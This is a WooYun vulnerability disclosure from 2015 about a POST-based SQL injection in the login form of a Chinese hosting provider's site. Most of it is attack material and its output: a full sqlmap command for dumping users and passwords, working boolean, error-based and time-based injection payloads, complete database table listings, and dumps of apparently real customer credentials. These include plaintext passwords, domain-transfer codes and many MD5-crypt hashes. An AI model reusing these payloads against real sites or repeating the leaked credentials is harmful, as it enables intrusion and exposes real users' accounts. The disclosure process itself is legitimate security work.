当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160623

漏洞标题:东方网景主站存在高危POST型SQL注射漏洞(大量用户密码泄露)

相关厂商:东方网景

漏洞作者: 慢慢

提交时间:2015-12-12 11:20

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-16: 厂商已经确认,细节仅向厂商公开
2015-12-26: 细节向核心白帽子及相关领域专家公开
2016-01-05: 细节向普通白帽子公开
2016-01-15: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

东方网景主站存在高危POST型SQL注射漏洞(大量用户密码泄露)

详细说明:

地址:http://**.**.**.**/user/login

$ python sqlmap.py -u "http://**.**.**.**/user/login" -p username --technique=BES --output-dir=output --form --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass

漏洞证明:

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=-2890' OR 2237=2237#&password=&verify=EGBB
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: username=-3369' OR 1 GROUP BY CONCAT(0x716a7a7a71,(SELECT (CASE WHEN (6586=6586) THEN 1 ELSE 0 END)),0x7170627871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=&verify=EGBB
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: username=Teuo';(SELECT * FROM (SELECT(SLEEP(5)))LxeR)#&password=&verify=EGBB
---
web application technology: Apache 2.2.22, PHP 5.3.17
back-end DBMS: MySQL 5.0.11
current user:    'user_epms@%'
current user is DBA:    False
database management system users [1]:
[*] 'user_epms'@'%'
Database: epmstest
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| support_Customer                      | 33152   |
| staff_log                             | 24013   |
| prima_tabLogins                       | 11155   |
| prima_tabMembers                      | 4639    |
| role_resource                         | 2673    |
| product_service                       | 1736    |
| file                                  | 1527    |
| product_price                         | 950     |
| product                               | 726     |
| product_parameter_value               | 701     |
| epms_resource                         | 466     |
| cms_doc                               | 359     |
| price                                 | 340     |
| cms_pos_doc                           | 284     |
| cms_doc_product                       | 237     |
| product_staff                         | 198     |
| product_package                       | 172     |
| service                               | 140     |
| user_domain_info                      | 133     |
| cms_doc_news                          | 127     |
| cms_category                          | 120     |
| domain_contact                        | 106     |
| payment                               | 99      |
| staff_credit_pay                      | 98      |
| orders_product                        | 95      |
| product_parameter                     | 94      |
| orders                                | 85      |
| orders_payment                        | 85      |
| orders_product_copy                   | 77      |
| service_domain                        | 74      |
| role_staff                            | 72      |
| staff                                 | 68      |
| cart_product                          | 65      |
| user_extend                           | 64      |
| product_category                      | 63      |
| ad                                    | 57      |
| cms_pos                               | 55      |
| `user`                                | 53      |
| orders_change                         | 53      |
| cart                                  | 52      |
| user_email                            | 45      |
| zhekou                                | 40      |
| renewal                               | 34      |
| staff_credit_recharge                 | 28      |
| service_function                      | 26      |
| cms_label                             | 24      |
| role                                  | 24      |
| email_template                        | 19      |
| ftp_quotalimits                       | 18      |
| ftp_quotatallies                      | 18      |
| service_ftp                           | 18      |
| department                            | 17      |
| service_ftp_domain                    | 16      |
| special_domain                        | 15      |
| product_package_domain                | 14      |
| article_category                      | 13      |
| invoice                               | 13      |
| service_database                      | 9       |
| service_email                         | 8       |
| service_extra                         | 7       |
| domain_dns                            | 6       |
| service_ftp_host                      | 6       |
| user_money_recharge                   | 5       |
| activity                              | 4       |
| question                              | 4       |
| service_dns                           | 4       |
| alipay                                | 3       |
| program                               | 3       |
| article                               | 2       |
| question_process                      | 2       |
| service_email_host                    | 2       |
| program_process                       | 1       |
| service_domain_access                 | 1       |
| service_package_split                 | 1       |
| user_money_pay                        | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 3111    |
| SESSION_VARIABLES                     | 325     |
| GLOBAL_VARIABLES                      | 314     |
| GLOBAL_STATUS                         | 287     |
| SESSION_STATUS                        | 287     |
| PARTITIONS                            | 273     |
| TABLES                                | 273     |
| STATISTICS                            | 260     |
| KEY_COLUMN_USAGE                      | 233     |
| TABLE_CONSTRAINTS                     | 231     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195     |
| COLLATIONS                            | 195     |
| CHARACTER_SETS                        | 39      |
| SCHEMA_PRIVILEGES                     | 30      |
| PLUGINS                               | 17      |
| PROCESSLIST                           | 11      |
| ENGINES                               | 6       |
| SCHEMATA                              | 3       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: epms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| staff_log                             | 17482969 |
| payment                               | 36390   |
| support_Customer                      | 33150   |
| orders_product                        | 32662   |
| login_log                             | 31111   |
| service                               | 28812   |
| question_process                      | 25239   |
| orders_payment                        | 23872   |
| orders                                | 23849   |
| trade_sum                             | 23388   |
| user_money_pay                        | 22745   |
| user_data_sign                        | 22038   |
| service_domain                        | 18437   |
| service_renewal                       | 17446   |
| question                              | 15105   |
| staff_credit_pay                      | 14858   |
| user_domain_info                      | 14306   |
| staff_credit_recharge                 | 13763   |
| renewal                               | 13520   |
| prima_tabLogins                       | 11155   |
| orders_change                         | 10946   |
| file                                  | 8843    |
| user_money_recharge                   | 8365    |
| invoice                               | 8220    |
| user_extend                           | 8135    |
| `user`                                | 8122    |
| cart_product                          | 6703    |
| update_password                       | 5693    |
| special_price                         | 5225    |
| ftp_quotalimits                       | 5037    |
| service_ftp                           | 5028    |
| ftp_quotatallies                      | 4918    |
| prima_tabMembers                      | 4639    |
| domain_contact                        | 4411    |
| user_email                            | 4309    |
| user_data                             | 4222    |
| cart                                  | 4178    |
| domain_optrecord                      | 3969    |
| role_resource                         | 3764    |
| service_email                         | 3705    |
| service_ftp_domain                    | 2890    |
| product_service                       | 2282    |
| alipay                                | 2105    |
| trusted_sites_domain                  | 2075    |
| trusted_sites                         | 1999    |
| service_log                           | 1948    |
| service_database                      | 1699    |
| update_time_log                       | 1536    |
| service_expand                        | 1299    |
| project_order                         | 1194    |
| invoice_flush                         | 1174    |
| service_extra                         | 1172    |
| product_price                         | 1109    |
| service_upgrade                       | 1046    |
| crontab_log                           | 1023    |
| project                               | 977     |
| product_parameter_value               | 890     |
| product                               | 874     |
| idcwork                               | 869     |
| epms_resource                         | 675     |
| service_changeUser                    | 673     |
| idc_optlog                            | 624     |
| cms_doc                               | 574     |
| dns_log                               | 523     |
| idc_ip                                | 513     |
| staff_credit_return                   | 507     |
| idc_server                            | 465     |
| idc_switchport                        | 425     |
| price                                 | 416     |
| cms_pos_doc                           | 415     |
| service_domain_access                 | 415     |
| cms_doc_product                       | 312     |
| cms_doc_news                          | 267     |
| service_tongyong                      | 243     |
| service_package_split                 | 242     |
| product_staff                         | 225     |
| product_package                       | 184     |
| tongyong_domain_contact               | 175     |
| special_domain                        | 172     |
| cms_category                          | 122     |
| backup_apply                          | 120     |
| role_staff                            | 120     |
| product_parameter                     | 109     |
| ftp_agent                             | 104     |
| staff                                 | 102     |
| trusted_sites_log                     | 92      |
| refund                                | 85      |
| renewal_category                      | 77      |
| service_rms                           | 71      |
| product_category                      | 69      |
| cms_pos                               | 67      |
| trusted_sites_data                    | 66      |
| ad                                    | 63      |
| achievement_adjust                    | 57      |
| domain_dns                            | 52      |
| zhekou                                | 42      |
| service_dns                           | 41      |
| service_function                      | 34      |
| webnic_data                           | 31      |
| idc_shelf                             | 30      |
| role                                  | 27      |
| email_template                        | 26      |
| cms_label                             | 25      |
| department                            | 17      |
| trial_form                            | 17      |
| idc_iprange                           | 16      |
| product_package_domain                | 14      |
| service_ftp_host                      | 14      |
| article_category                      | 13      |
| delayed_renewal                       | 13      |
| activity                              | 11      |
| program_process                       | 10      |
| service_trial_change                  | 9       |
| idc_row                               | 7       |
| idc_vlan                              | 7       |
| program                               | 7       |
| account                               | 4       |
| attorn_domain                         | 4       |
| service_email_host                    | 3       |
| article                               | 2       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: epmstest
Table: service_domain_access
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: epmstest
Table: service_email
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: epmstest
Table: prima_tabLogins
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| passwd | varchar(50) |
+--------+-------------+
Database: epmstest
Table: service_domain
[2 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| password          | varchar(32) |
| transfer_password | varchar(50) |
+-------------------+-------------+
Database: epmstest
Table: support_Customer
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| InitPassword | varchar(16) |
| Password     | varchar(16) |
+--------------+-------------+
Database: epmstest
Table: service_database
[1 column]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| database_password | varchar(255) |
+-------------------+--------------+
Database: epmstest
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: epmstest
Table: orders_access_password
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epmstest
Table: service_ftp
[2 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| ftp_password  | varchar(255) |
| init_password | varchar(255) |
+---------------+--------------+
Database: epmstest
Table: staff
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: epms
Table: service_database
[1 column]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| database_password | varchar(255) |
+-------------------+--------------+
Database: epms
Table: service_domain_access
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: epms
Table: service_email
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: epms
Table: prima_tabLogins
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| passwd | varchar(50) |
+--------+-------------+
Database: epms
Table: service_domain
[2 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| password          | varchar(32) |
| transfer_password | varchar(50) |
+-------------------+-------------+
Database: epms
Table: login_log
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: epms
Table: support_Customer
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| InitPassword | varchar(16) |
| Password     | varchar(16) |
+--------------+-------------+
Database: epms
Table: service_tongyong
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epms
Table: tongyong_domain_contact
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epms
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: epms
Table: orders_access_password
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epms
Table: service_ftp
[2 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| ftp_password  | varchar(255) |
| init_password | varchar(255) |
+---------------+--------------+
Database: epms
Table: staff
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: epmstest
Table: service_domain_access
[1 entry]
+----------+
| password |
+----------+
| 123456   |
+----------+
Database: epmstest
Table: service_email
[8 entries]
+------------+
| password   |
+------------+
| 1q1s9252eb |
| 5jijg4d980 |
| 7iq0e14hjj |
| 7o05assl3r |
| bt7i3hojie |
| hnjs       |
| im5jomm4s8 |
| p7nltg04qk |
+------------+


atabase: epmstest
Table: prima_tabLogins
[11155 entries]
+------------------------------------+
| passwd                             |
+------------------------------------+
| $1$..00810E$.elN1lI9WqZz6fTexstiq1 |
| $1$..2/j52Z$O8Qlg8.o1EB4jYtG.gREe1 |
| $1$..7/CD.X$bdgpS5SrHn1ICeZuzLhP00 |
| $1$..llAKiC$ILSycKO1BSLaat0JasQw.0 |
| $1$..VattaE$ogWpndv2EtvXBR9AO7HuE. |
| $1$./e1Lqnn$kEgykZSC6gUcRupteplVi. |
| $1$./Q/b8pu$ef6pkThDJCiYpl4t1dSeY0 |
| $1$./S5b/08$YBWFduPjOK1EiXjGYJ2ES0 |
| $1$.0//auds$wZhqCa2UrP5uEb2y6J7HI. |
| $1$.0Q1GanG$6dT479a7Svdx.gtg7tjy.. |
| $1$.0R0X1xL$TcS0.hpIcJ4/Ygl/R/wi0. |
| $1$.0X1rcZy$LbdN5RYApYPkPEHEsFwjl1 |
| $1$.0Y1gT2E$BNqG.RYivO92ZwiZho7YE0 |
| $1$.1TSzARA$C2qGxQZ7AcnLMYAOKuTSd/ |
| $1$.1y/G5BF$3h8Rkzb4MgVCzYHwjm2Ck0 |
| $1$.2F/PLea$R0TfwMIt1Zb226FYI6Pr61 |
| $1$.2m1kZb0$O1mOU9b6L/.yfRhgjZzkC0 |
| $1$.3I1vK74$7KYBmv8kM2709P5ylOop4. |
| $1$.3j/4Tfy$EpD8ycQsGRCbZglZs/Xx// |
| $1$.3J/pzAM$coWaz3FEF07HUKV1kruxq/ |
| $1$.3K08z.h$KVfTvLpUpdBqyqHQgYHwX/ |
| $1$.511Tiva$bDWU3W8EKX97PUw5zrCvb/ |
| $1$.519jHf6$Bta/3ZGQkQQeo2xa40AXN. |
| $1$.521m5t3$QZEgOof1OvLODNsNSp2Xk. |
| $1$.5B1xYkc$DnD645g5t0DUa35cPeARW/ |
| $1$.5C1ICG9$ZDyxkJpivtonE7dIu5YWz. |
| $1$.5Z04EOj$6GqSy7ENpk3qXscOtLm8o. |
| $1$.6./oIkp$9vuQRvnichXJf5FgFO2yK0 |
| $1$.6azq6jD$nMJh0qEG.ypKUQyZAR8HT. |
| $1$.6uadVk6$EwtuT2ca0NQFk318NLGFG/ |
| $1$.791rwKl$oyfZPFMhGHOICGBRvDfPg/ |
| $1$.8//BmHp$gCcJ8wOFPhQreVgyx./bZ/ |
| $1$.8A/WSs7$an6MMUpafHOwKPSEMPT841 |
| $1$.8D04UsJ$24DAl2Nh8cj632eonff6.0 |
| $1$.8I0bAco$2tdkex6mUUg01qkkEUQoJ. |
| $1$.8q/uwAh$bKzhyh1VuwYoE8k/wvqJQ1 |
| $1$.8u/Lh51$Ww/cwMlmY3pBl.PpBGwx30 |
| $1$.98EClM9$XsUsdM2Rt8iueCW4EisW.. |
| $1$.9B14aMR$VWVI3EQq3yp5xSa4Q/Zg50 |
| $1$.9e1G8Ok$5G68eJP25MruNgWpH86Jz. |
| $1$.A41tC/0$EEh1ht0RY7Hf/kwoouVSA/ |
| $1$.ad/VmAm$hJOWIftYXQmi//fuOSiGz1 |
| $1$.ah101Xj$LcPO.0ph4L4N/ZukOxZGP1 |
| $1$.ak186MH$r.EaUz6qr.ESHdeUKxRjk/ |
| $1$.ap/72SJ$pJrJktNyhDDAdOMzhMACm. |
| $1$.Ba0gdhP$4l2UYoHSsByanzIhffQce1 |
| $1$.bh0qZjJ$aFG5PFSvsEBojE/RW57DZ. |
| $1$.Bj/Kk3D$klzoQzRU4UnztYm8zjqkQ0 |
| $1$.BK06wk7$hhX6O31iCRAAMZtqrZuOP/ |
| $1$.bobuOWA$quVnzx1hXPyRIL/Nv7uUK0 |
| $1$.bu0hNkp$fz/m3GnbCh9H9aFZhPbnd1 |
| $1$.bX0Hm/7$5RGoX0728f1lh7Ih0lvQW1 |
| $1$.BY0JjMs$Z.DPsLDb/I6e1/c5WQZhg. |
| $1$.bZ0WYQi$ji0kxSVGr.Gj.XI2qVlyu. |
| $1$.c40qkTV$Za6q.Yd9wch4SgyhevE9i0 |
| $1$.Cbxmxb6$t58AyrmEkKJ41bPSMbVJu. |
| $1$.cD07t48$/UylFC5dRDdAh4oFKxUOj/ |
| $1$.cKwyT.C$AbvGcwd/mb8rFNC4rbMrQ/ |
| $1$.cU1Shfd$onRxER11b0nBnvS.X70nt/ |
| $1$.Cw/qjkR$Bpa4Pi2xCciOZL7yWXOCn. |
| $1$.d51EZiA$i5YiwPEJ766o2pj5TRjwA0 |
| $1$.d8/S4o4$KXk/SfW3vFKEBsSjcm5mA. |
| $1$.Dd0hxsy$XpsxTwmAOl1.gkwhq4Tts1 |
| $1$.Dj/ICHb$9NfulTJXqRD3Lt/q50ytm/ |
| $1$.dW/p34Y$D7ZkEXfylRXwPxOwttBI0/ |
| $1$.EAE3loE$2S4WBImA2aQ1MC2RskL.R0 |
| $1$.Ec/le/c$01kGIMzGkYS65B6I94C/S/ |
| $1$.EC1PT0h$aQpGOAGNPeKNd9K394bbF/ |
| $1$.EG//3/k$CTP2vwCsxk3lZFvRgUDPv. |
| $1$.ei1U1lg$kYMPvvFR/Jd2H0fzgMBeC1 |
| $1$.f40db89$BuMelp.zssWMH56d4t/Sn1 |
| $1$.fbStdk7$CsghvuXCsZvpgkg4pPhzF. |
| $1$.fsRTU49$cx8o/ZxaGmD/ZRPCRrPlv0 |
| $1$.FtMp80A$NLT9MVqrehdtpZdE3cZls/ |
| $1$.Gd17b.0$Yh1CzQzEMohVTguD6w2tQ1 |
| $1$.gf1JKTp$.coBZxkVcyJgdeDG2lXXG/ |
| $1$.gq/bVoQ$ohF7eHH2GJpmr0lnMl8ZC0 |
| $1$.gx0OfrV$PZnjAhd/l0CRD.o6NVcm30 |
| $1$.h5/rYZt$I/MFcJP/q3zTc06Kx7uLl0 |
| $1$.H6/ka66$5cnssdqDEAajSfa564Hms0 |
| $1$.HA./o2B$XYTB1TIm44Bl72Fhr7nn3. |
| $1$.Hi0MnxB$2weI9BRZhnNEHL2ViOgY7/ |
| $1$.hY1PotC$aNvDa/.mFmKtc27.bTvGX1 |
| $1$.IO/ZoQw$ZfijHJQinXrmLHHeZG5H.0 |
| $1$.IObhqEC$a33N71Cf59/zssFlUfJlY/ |
| $1$.irNYtx9$7q2bKOFa9KG6BImhGu6uD0 |
| $1$.IV0SNym$.yGjmOFB79NPBVfi7XE8G/ |
| $1$.ix0Wrj2$.ROGYi52xmCJ3Iojzbtz./ |
| $1$.Iy6QOcB$pXK.TPFd6RqH94s1JFmu0/ |
| $1$.J30r6Lh$pAYbEdvl/xfrpKkniqqxe/ |
| $1$.j5/bBFO$4WDMWBNKSOzMqwScUrtwn1 |
| $1$.JA/RjSh$HdJd15GzKUCo9waezrMqp1 |
| $1$.jI0brWv$z4BGiNSEvf/g45DwGHlL80 |
| $1$.jl06Son$vC27YkuEITDd1QFnMPC4q/ |
| $1$.Jw02v1Q$V4JIJqROV26PYmnayx8df. |
| $1$.Ka1zHQM$ZHuIQCKKGwkBHx7rz5bfN0 |
| $1$.KMxiqB7$wla33yvluZrO/ljBGYl/t1 |
| $1$.KW0phBd$bHNQH4n2onZ.lrBv42os./ |
| $1$.l41qUld$kBZJ/cqrIFeTPGCk6MlwU/ |
| $1$.lb1mCdM$Q0SXrQrxXFI8gw.kwy73C. |
| $1$.Lh/XknG$rlbsYNJXfnxCLwmOEbOLL0 |
| $1$.ll0If3u$fshwrSHwCZdAR8ieWERab. |
| $1$.Ln1F/fQ$kc0cjxfrA2dhE9Sggnz0K/ |


Database: epmstest
Table: service_domain
[74 entries]
+----------+-------------------+
| password | transfer_password |
+----------+-------------------+
|          | 82a4ff9b          |
|          | gj3h3gnkmd        |
|          |                   |
|          |                   |
|          | arsfb0bq6r        |
|          |                   |
|          |                   |
|          |                   |
|          |                   |
|          |                   |
|          |                   |
|          | btfgeklmes        |
|          | irjet5965i        |
|          | si1m4anrja        |
|          | bbj44hp1dg        |
|          |                   |
|          |                   |
|          |                   |
|          |                   |
|          | a83545cb          |
|          | bfac3928          |
|          | 2d975d57          |
|          | f4207369          |
|          | e7f98d7b          |
|          | 2a5bee05          |
|          | 6a45ac65          |
|          | c51ab38b          |
|          | 4d9dc99e          |
|          | fee1747f          |
|          | 47f00c18          |
|          | 7162050e          |
|          | f0fd564b          |
|          | cd4bab83          |
|          | cb18301d          |
|          | bda1f638          |
|          | fe8fe214          |
|          | nh1mbjb8jm        |
|          |                   |
|          |                   |
|          |                   |
|          | o2ms8b20f1        |
|          | me2qb84hsl        |
|          |                   |
|          | ntes9qdgnd        |
|          | njon5g89i0        |
|          | 564e4t013r        |
|          | h6sm6nr2jf        |
|          |                   |
|          |                   |
|          | 44b8t9a18t        |
|          |                   |
|          |                   |
|          |                   |
|          |                   |
|          |                   |
|          |                   |
|          | i4ppm1nn9s        |
|          |                   |
|          |                   |
|          |                   |
|          | nbpqn68mbg        |
|          | 123456            |
|          |                   |
|          | qepnn1hl5l        |
|          | 2kdapl3ijn        |
|          |                   |
|          | ott8rrqmer        |
|          |                   |
|          | FyhpHE            |
|          | 464149            |
|          | 6e73322e65        |
|          |                   |
|          | k6m5fdiqbo        |
|          |                   |
+----------+-------------------+
Database: epmstest
Table: support_Customer
[33152 entries]
+-------------------+------------------+
| InitPassword      | Password         |
+-------------------+------------------+
|                   |                  |
|                   |                  |
|                   |                  |
|                   |                  |
| dgq1967           | !2#4567*         |
| !@hrg@!           | !@hrg@!          |
| !abc              | !abc             |
| gardenwio         | !QAZ2wsx#EDC     |
| !qnvecexoay       | !qnvecexoay      |
| ricki             | !TRS-2011*       |
| !woshibinbin?     | !woshibinbin?    |
| chinahil          | !zhongyuan2008   |
| !zxz198           | !zxz198          |
| ha1140            | #aTch123         |
| cnpec             | #c3n7p0e0*       |
| cn1234            | #Cnis20O8#       |
| #EDC4rfv          | #EDC4rfv         |
| sonicway          | #SonicwayDomain  |
| #thj2721576#      | #thj2721576#     |
| &%#369            | &%#369           |
| )(*&^%$#@!        | )(*&^%$#@!       |
| *#06#             | *#06#            |
| *****             | *****            |
| ******            | ******           |
| ******            | ******           |
| ********          | ********         |
| ********          | ********         |
| **********        | **********       |
| ***---            | ***---           |
| **63*7089         | **63*7089        |
| unicorn           | *+Soo_in0??27    |
| *09205223*        | *09205223*       |
| 123456            | *20050630*       |
| 818669            | *Abit123         |
| tsinghuazyh       | *happyxu2        |
| *Iamtlql*         | *Iamtlql*        |
| kmhnahotel        | *kmhnair*        |


Database: epms
Table: service_domain_access
[415 entries]
+------------------+
| password         |
+------------------+
| !1nNV$g34*       |
| $idahzrx@2       |
| $idahzrx@2       |
| )gf3d*v!^?       |
| ,bo42I{mc\\      |
| 03pt3qe22b       |
| 05eh5e54o0       |
| 05SdZ6BM/y       |
| 05SdZ6BM/y       |
| 08laqptom9       |
| 0gbjme7s5k       |
| 0ia6426jl5       |
| 0j2s=lR*d[       |
| 0lr10hb2ob       |
| 0o64293m01       |
| 0r4nm9metn       |
| 0t5qlikgne       |
| 0tnp2lqtq6       |
| 1(c:,62vio       |
| 10006277         |
| 10t168d5jb       |
| 11ttKb!RI2       |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |


Database: epms
Table: prima_tabLogins
[11155 entries]
+------------------------------------+
| passwd                             |
+------------------------------------+
| $1$..00810E$.elN1lI9WqZz6fTexstiq1 |
| $1$..2/j52Z$O8Qlg8.o1EB4jYtG.gREe1 |
| $1$..7/CD.X$bdgpS5SrHn1ICeZuzLhP00 |
| $1$..llAKiC$ILSycKO1BSLaat0JasQw.0 |
| $1$..VattaE$ogWpndv2EtvXBR9AO7HuE. |
| $1$./e1Lqnn$kEgykZSC6gUcRupteplVi. |
| $1$./Q/b8pu$ef6pkThDJCiYpl4t1dSeY0 |
| $1$./S5b/08$YBWFduPjOK1EiXjGYJ2ES0 |
| $1$.0//auds$wZhqCa2UrP5uEb2y6J7HI. |
| $1$.0Q1GanG$6dT479a7Svdx.gtg7tjy.. |
| $1$.0R0X1xL$TcS0.hpIcJ4/Ygl/R/wi0. |
| $1$.0X1rcZy$LbdN5RYApYPkPEHEsFwjl1 |
| $1$.0Y1gT2E$BNqG.RYivO92ZwiZho7YE0 |
| $1$.1TSzARA$C2qGxQZ7AcnLMYAOKuTSd/ |
| $1$.1y/G5BF$3h8Rkzb4MgVCzYHwjm2Ck0 |
| $1$.2F/PLea$R0TfwMIt1Zb226FYI6Pr61 |
| $1$.2m1kZb0$O1mOU9b6L/.yfRhgjZzkC0 |
| $1$.3I1vK74$7KYBmv8kM2709P5ylOop4. |
| $1$.3j/4Tfy$EpD8ycQsGRCbZglZs/Xx// |
| $1$.3J/pzAM$coWaz3FEF07HUKV1kruxq/ |
| $1$.3K08z.h$KVfTvLpUpdBqyqHQgYHwX/ |
| $1$.511Tiva$bDWU3W8EKX97PUw5zrCvb/ |
| $1$.519jHf6$Bta/3ZGQkQQeo2xa40AXN. |
| $1$.521m5t3$QZEgOof1OvLODNsNSp2Xk. |
| $1$.5B1xYkc$DnD645g5t0DUa35cPeARW/ |
| $1$.5C1ICG9$ZDyxkJpivtonE7dIu5YWz. |
| $1$.5Z04EOj$6GqSy7ENpk3qXscOtLm8o. |
| $1$.6./oIkp$9vuQRvnichXJf5FgFO2yK0 |
| $1$.6azq6jD$nMJh0qEG.ypKUQyZAR8HT. |
| $1$.6uadVk6$EwtuT2ca0NQFk318NLGFG/ |
| $1$.791rwKl$oyfZPFMhGHOICGBRvDfPg/ |
| $1$.8//BmHp$gCcJ8wOFPhQreVgyx./bZ/ |
| $1$.8A/WSs7$an6MMUpafHOwKPSEMPT841 |
| $1$.8D04UsJ$24DAl2Nh8cj632eonff6.0 |

修复方案:

上WAF。

版权声明:转载请注明来源 慢慢@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-16 19:06

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT发其信息安全管理部门,由其后续协调网站管理单位处置。

最新状态:

暂无